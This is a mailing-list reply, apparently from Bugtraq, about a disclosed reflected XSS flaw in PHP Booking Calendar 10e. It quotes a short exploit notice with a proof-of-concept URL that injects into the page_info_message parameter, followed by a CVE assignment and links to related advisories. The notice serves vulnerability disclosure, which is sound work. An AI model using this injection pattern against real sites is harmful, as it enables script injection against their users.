Re: PHP Booking Calendar 10e XSS



On Sun, Dec 18, 2011 at 03:15:36PM -0500, tom wrote:
# Exploit Title: PHP Booking Calendar 10e XSS
# Date: 12/16/11
# Author: G13
# Software Link: http://sourceforge.net/projects/bookingcalendar/
# Version: 10e
# Category: webapps (php)
#

##### Vulnerability #####

The page_info_message varibale in the details_view.php does not
sanitize input. This is a relective XSS attack.

##### Exploit #####

http://127.0.0.1/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS]

CVE-2011-5045 can be used for this issue.

- Henri Salo



Relevant Pages

  • Re: SASHA v0.2.0 Mutiple XSS
    ... # Software Link: http://sourceforge.net/projects/sasha/files/ ... # Category: webapps (php) ...
    (Bugtraq)
  • SASHA v0.2.0 Mutiple XSS
    ... # Software Link: http://sourceforge.net/projects/sasha/files/ ... # Category: webapps (php) ...
    (Bugtraq)
  • [Full-disclosure] CVE-2008-5557 - PHP mbstring buffer overflow vulnerability
    ... CVE-2008-5557 - PHP mbstring buffer overflow vulnerability ... 4.3.0 and later versions including PHP 5 ... A heap buffer overflow was found in mbstring extension that is ... The vulnerability occurs in the part of the encoding conversion facility ...
    (Full-Disclosure)
  • [Full-disclosure] [ MDVSA-2009:324 ] php
    ... Package: php ... Multiple vulnerabilities was discovered and corrected in php: ... before 5.2.9 allows remote attackers to cause a denial of service ... Unspecified vulnerability in PHP before 5.2.11 has unknown impact ...
    (Full-Disclosure)
  • [ MDVSA-2009:324 ] php
    ... Package: php ... Multiple vulnerabilities was discovered and corrected in php: ... before 5.2.9 allows remote attackers to cause a denial of service ... Unspecified vulnerability in PHP before 5.2.11 has unknown impact ...
    (Bugtraq)